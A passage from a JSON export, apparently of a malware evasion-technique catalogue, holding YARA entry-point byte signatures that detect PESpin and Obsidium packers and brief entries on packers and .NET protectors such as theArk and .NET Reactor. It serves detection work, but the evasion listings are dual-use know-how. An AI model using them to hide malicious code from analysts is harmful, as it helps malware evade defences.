4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESPin_v13_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 AC DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V10_cyberbobnbsp_nbsp_SignByfly_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 ?? ?? ?? ?? ?? ?? ?? C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 ?? EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? ?? ?? ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v13beta2_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 ?? 4E 40 00 8B 42 3C 03 C2 89 85 ?? 
4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D ?? 4E 40 00 53 8F 85 ?? 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD ?? 4F 40 00 8D 5B 04 8B 1B 89 9D ?? 4F 40 00 E8 00 00 00 00 58 01 68 05 68 BC 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD ?? 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v10_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 C8 DC 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 D2 42 40 00 8B 42 3C 03 C2 89 85 DC 42 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D F0 42 40 00 53 8F 85 94 41 40 00 BB ?? 00 00 00 B9 8C 0B 00 00 8D BD 80 43 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 40 4E 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 FD 68 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 
2B C9 83 C9 15 0F A3 C8 0F 83 81 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V071_cyberbob_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 83 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 BD 2D 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 80 40 FB EB A2 40 02 00 E0 91 32 68 CB 00 00 00 59 8D BD A3 5D 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V11_cyberbob_20080311: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 ?? 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 02 ?? ?? F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 ?? ?? ?? ?? ?? ?? 
F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V132_cyberbobnbsp_nbsp_SignByfly_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 17 E6 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D FF E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF E8 02 00 00 00 ?? ?? 5A 81 ?? ?? ?? ?? ?? 83 EA FE 89 95 A9 57 40 00 2B C0 2B C9 83 F1 06 09 85 CB 57 40 00 9C D3 2C 24 80 C1 FB 21 0C 24 50 52 B8 36 C7 09 FF 05 FE 37 F6 00 F7 64 24 08 8D 84 28 B1 35 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC CD 20 BB 69 74 58 0B C1 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_13x_Cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 
60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 71 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_v07_Cyberbob_: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 88 39 40 00 8B 42 3C 03 C2 89 85 92 39 40 00 EB 01 DB 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D A6 39 40 00 53 8F 85 4A 38 40 00 BB ?? 00 00 00 B9 EC 0A 00 00 8D BD 36 3A 40 00 4F EB 01 AB 30 1C 39 FE CB E2 F9 EB 01 C8 68 CB 00 00 00 59 8D BD 56 44 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 B3 5F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D 99 39 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V0b_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 26 E8 01 00 00 00 ?? 
5A 33 C9 ?? ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 8B 59 24 03 DA 8B 1B ?? ?? ?? ?? ?? ?? 53 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 0C 5B 6A 17 59 30 0C 03 02 CB 4B 75 F8 40 8D 9D 41 8F 4E 00 50 53 81 2C 24 01 78 0E 00 ?? ?? ?? ?? ?? ?? C3 92 EB 15 68 ?? ?? ?? ?? ?? B9 ?? 08 00 00 ?? ?? ?? ?? ?? ?? 4F 30 1C 39 FE CB E2 F9 68 1D 01 00 00 59 ?? ?? ?? ?? ?? ?? C0 0C 39 02 E2 FA 68 ?? ?? ?? ?? 50 01 6C 24 04 E8 BD 09 00 00 33 C0 0F 84 C0 08 00 00 ?? ?? ?? ?? ?? ?? 50 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF E0 C3 8D 64 24 04 E8 53 0A 00 00 D7 58 5B 51 C3 F7 F3 32 DA ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 81 2C 24 A3 00 00 00 58 ?? ?? ?? ?? ?? ?? 53 FF E0 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v1304_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 CD 4E 40 00 8B 42 3C 03 C2 89 85 D7 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D EB 4E 40 00 53 8F 85 E1 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD 90 4F 40 00 8D 5B 04 8B 1B 89 9D 95 4F 40 00 E8 00 00 00 00 58 01 68 05 68 D3 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD C6 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C EB 04 01 EB 0? 
}\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESPin_v13_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 CD 4E 40 00 8B 42 3C 03 C2 89 85 D7 4E 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D EB 4E 40 00 53 8F 85 E1 4C 40 00 EB 07 FA EB 01 FF EB 04 E3 EB F8 69 8B 59 38 03 DA 8B 3B 89 BD 90 4F 40 00 8D 5B 04 8B 1B 89 9D 95 4F 40 00 E8 00 00 00 00 58 01 68 05 68 D3 65 0F E2 B8 77 CE 2F B1 35 73 CE 2F B1 03 E0 F7 D8 81 2C 04 13 37 CF E1 FF 64 24 FC FF 25 10 BB ?? 00 00 00 B9 84 12 00 00 8D BD C6 4F 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C EB 04 01 EB 04 CD EB FB 2B C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 79 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 20 2F 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC FF EA EB EB 01 C8 E8 01 00 00 00 68 58 FE 48 1F 0F 84 94 02 00 00 75 01 9A 81 70 03 E8 98 68 EA 83 C0 21 80 40 FB EB A2 40 02 00 E0 91 32 68 CB 00 00 00 59 8D BD 7E 61 40 00 E8 03 00 00 00 EB 04 FA EB FB 68 83 04 24 0C C3 8D C0 0C 39 02 49 9C E8 03 00 00 00 EB 04 8D EB FB FF 83 04 24 0C C3 A3 C1 2C 24 06 F7 14 24 83 24 24 01 50 52 B8 61 B2 DC 12 05 44 4D 23 ED F7 64 24 08 8D 84 28 B2 2F 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC 9A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_V07_cyberbob_20080312: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 
60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 83 D5 46 00 0B E4 74 9E 75 01 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 ?? ?? ?? ?? ?? 5D 33 C9 41 E2 17 EB 07 ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF 8B ?? ?? ?? ?? ?? 8B 42 3C 03 C2 89 ?? ?? ?? ?? ?? EB 01 ?? 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 ?? EB FB ?? 83 04 24 0C C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v11_by_cyberbob: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 7D DE 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 EB 04 9A EB 04 00 EB FB FF 8B 95 C3 4B 40 00 8B 42 3C 03 C2 89 85 CD 4B 40 00 EB 02 12 77 F9 72 08 73 0E F9 83 04 24 17 C3 E8 04 00 00 00 0F F5 73 11 EB 06 9A 72 ED 1F EB 07 F5 72 0E F5 72 F8 68 EB EC 83 04 24 07 F5 FF 34 24 C3 41 C1 E1 07 8B 0C 01 03 CA E8 03 00 00 00 EB 04 9A EB FB 00 83 04 24 0C C3 3B 8B 59 10 03 DA 8B 1B 89 9D E1 4B 40 00 53 8F 85 D7 49 40 00 BB ?? 00 00 00 B9 FE 11 00 00 8D BD 71 4C 40 00 4F EB 07 FA EB 01 FF EB 04 E3 EB F8 69 30 1C 39 FE CB 49 9C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v01_Cyberbob_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 
60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 88 DF 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PESpin_v01_Cyberbob_h: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF }\r\n        $b = { EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 5C CB 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 B3 28 40 00 8B 42 3C 03 C2 89 85 BD 28 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D D1 28 40 00 53 8F 85 C4 27 40 00 BB ?? 00 00 00 B9 A5 08 00 00 8D BD 75 29 40 00 4F 30 1C 39 FE CB E2 F9 68 2D 01 00 00 59 8D BD AA 30 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 07 4F 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D C4 28 40 00 8B D6 B9 10 00 00 00 AC 84 C0 74 06 C0 4E FF 03 E2 F5 E8 00 00 00 00 59 81 C1 1D 00 00 00 52 51 C1 E9 05 23 D1 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule PESpin_V132_cyberbob_20080310: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 01 ?? 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 17 E6 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 ?? EB 01 ?? EB 0D FF E8 01 00 00 00 ?? 5A 83 EA 0B FF E2 EB 04 ?? EB 04 00 EB FB FF E8 02 00 00 00 ?? ?? 5A 81 ?? ?? ?? ?? ?? 
83 EA FE 89 95 A9 57 40 00 2B C0 2B C9 83 F1 06 09 85 CB 57 40 00 9C D3 2C 24 80 C1 FB 21 0C 24 50 52 B8 36 C7 09 FF 05 FE 37 F6 00 F7 64 24 08 8D 84 28 B1 35 40 00 89 44 24 08 5A 58 8D 64 24 04 FF 64 24 FC CD 20 BB 69 74 58 0B C1 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 205,
            "unprotect_id": "U1424",
            "name": "theArk",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "A packer tool developed in C/C++. It fully implements its own linker and uses dynamic decompression and in-memory spraying to complete the file mapping.",
            "resources": "https://github.com/aaaddress1/theArk",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 204,
            "unprotect_id": "U1423",
            "name": ".Net Reactor",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": ".NET Reactor is used to prevent reverse engineering by adding different protection layers to .NET assemblies. Besides standard obfuscation techniques, it includes special features such as NecroBit, Virtualization, x86 Code Generation and Anti Tampering.",
            "resources": "https://www.eziriz.com/dotnet_reactor.htm",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 203,
            "unprotect_id": "U1422",
            "name": ".Net Anti-Decompiler",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": ".Net Anti-Decompiler is a protection tool for .Net assemblies. It provides an extra layer of security and compliance, protecting .Net applications from reverse engineering.",
            "resources": "https://www.techipick.com/dotnet-anti-decompiler",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 202,
            "unprotect_id": "U1421",
            "name": "Obsidium",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "Obsidium is a software protection and licensing system that is designed to protect 32-bit and 64-bit Windows software applications and games from reverse engineering, unauthorized modifications (\"cracking\") and redistribution (\"software piracy\") while providing a licensing system.",
            "resources": "https://www.obsidium.de/home",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 115,
                    "key": "yara_detect_obsidium",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Obsidium",
                    "rule": "rule Obsidium_1337_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 02 ?? ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 02 ?? ?? EB 04 ?? ?? ?? ?? 58 EB 04 ?? ?? ?? ?? EB 03 ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 03 ?? ?? ?? E8 23 27 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1350_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB 04 ?? ?? ?? ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 01 ?? E8 ?? ?? ?? ?? EB 01 ?? EB 02 ?? ?? 58 EB 04 ?? ?? ?? ?? EB 02 ?? ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 }\r\n        $b = { EB 03 ?? ?? ?? E8 ?? ?? ?? ?? EB 02 ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 20 EB 03 ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 04 ?? ?? ?? ?? 50 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v10061_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF 1C 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1337_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? 
